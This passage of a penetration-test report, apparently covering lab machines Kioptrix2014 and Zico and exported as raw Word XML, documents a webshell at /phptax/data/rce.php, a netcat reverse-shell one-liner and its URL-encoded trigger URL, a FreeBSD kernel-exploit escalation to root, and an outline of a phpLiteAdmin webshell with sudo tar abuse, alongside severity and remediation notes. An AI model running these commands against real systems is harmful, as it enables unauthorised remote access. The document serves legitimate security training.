    <w:p w14:paraId="70FCEA16" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can access the webshell at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/phptax/data/rce.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and inject commands with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>?cmd=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA17" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3" w:rsidP="0047626D">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAD6" wp14:editId="12D32409">
            <wp:extent cx="3886200" cy="792942"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture" descr="d237d4993fd0e89bce2bcf7740e76c4f.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/ab39cd6410114eae9114e8c1aeca9a64.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3923434" cy="800539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA18" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>d237d4993fd0e89bce2bcf7740e76c4f.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA19" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nice! We now have reliable code execution. We can spawn reverse shell by utilizing the netcat binary as follows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.128 443 &gt;/tmp/f</w:t>
      </w:r>
      <w:r>
        <w:t>. To prevent certain characters from messing up the exploit, we URL-encode the whole payload and visit the following URL to trigger it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA1A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>http://10.0.0.139:8080/phptax/data/rce.php?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%30%2e%30%2e%31%32%38%20%34%34%33%20%3e%2f%74%6d%70%2f%66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA1B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nice, we now have a stable shell as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA1C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3" w:rsidP="0047626D">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAD8" wp14:editId="186E7436">
            <wp:extent cx="4010025" cy="1053053"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture" descr="26bfb20bdf976426fa1da426a6115b7e.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/dc7495e481304f8991d3f2b205ed49f3.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4025938" cy="1057232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA1D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>26bfb20bdf976426fa1da426a6115b7e.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA1E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="severity-2"/>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="70FCEA1F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Any user with access to the network this machine is on may be able to read sensitive information and/or remotely exploit the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA20" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="remediation-2"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="70FCEA21" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Don’t rely on user-agents as a security measure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA22" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discontinue or update the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>pChart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA23" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discontinue or update the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phptax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA24" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="proof-2"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="70FCEA25" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="privilege-escalation-1"/>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="70FCEA26" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="vulnerability-exploitation-3"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="70FCEA27" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:t>, we don’t seem to find much that is usable for privilege escalation. Since the system is quite old, let’s look for kernel exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA28" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ uname -a</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA29" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Looking for exploits for FreeBSD 9, we stumble upon </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>this exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> which seems interesting and relevant for our version. Let’s try it out! We grab the source code, transfer it to the target system using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and compile it using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the target (to avoid compiling issues). Running the binary, it drops us into a root shell! Awesome!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA2A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="severity-3"/>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="70FCEA2B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Any user on the machine may execute this or similar exploits to gain full control over the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA2C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="remediation-3"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="70FCEA2D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Patch the operating system to the latest - or at least a more recent - version of FreeBSD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA2E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="proof-3"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="70FCEA2F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEADA" wp14:editId="70FCEADB">
            <wp:extent cx="5943600" cy="5287406"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture" descr="a95dfa6c8b04130cc0e035e71de295b1.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/2e4416476b68490a8d24e3d7ef51433f.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5287406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA30" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>a95dfa6c8b04130cc0e035e71de295b1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA31" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="miscellaneous-notes"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Miscellaneous notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="70FCEA32" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The author implemented a nice monitoring feature on the box, confronting with how much noise you make. I generated 35 “level 6” alerts, which would otherwise have had me blocked for 10 minutes each. Phew!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA33" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3" w:rsidP="0047626D">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEADC" wp14:editId="3445C881">
            <wp:extent cx="2962275" cy="1519311"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture" descr="31ca80e6a99a0c083eb47f97fb183b07.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/d980375a0a284cd699d453a2bb24acbb.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2975057" cy="1525867"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA34" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>31ca80e6a99a0c083eb47f97fb183b07.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA35" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="system-ip-10.0.100.105-zico"/>
      <w:bookmarkStart w:id="72" w:name="_Toc39759516"/>
      <w:r>
        <w:t>System IP 10.0.100.105 (Zico)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="70FCEA36" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="system-overview-2"/>
      <w:r>
        <w:t>System overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="pct"/>
        <w:tblLook w:val="07C0" w:firstRow="0" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA39" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA37" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA38" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.100.105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA3C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA3A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA3B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Zico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA3F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA3D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA3E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>04-05-2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA42" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA40" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Point Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA41" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70FCEA43" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="exploitation-overview-2"/>
      <w:r>
        <w:t>Exploitation Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="70FCEA44" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To exploit this machine we identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phpLiteAdmin v1.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which allows us to write arbitrary files to the webserver. We exploit this privilege to write a webshell, which effectively grants us command execution on the server. To escalate our privileges, we abuse our sudo rights on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary to spawn an interactive shell as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA45" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="portscan---tcp-2"/>
      <w:r>
        <w:t>Portscan - TCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="70FCEA46" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>PORT      STATE SERVICE REASON          VERSION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>22/tcp    open  ssh     syn-ack ttl 128 OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>| ssh-hostkey:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98r</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>bT0JW6+Wqa7v0K+N82xf87fVkJcXAuU/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
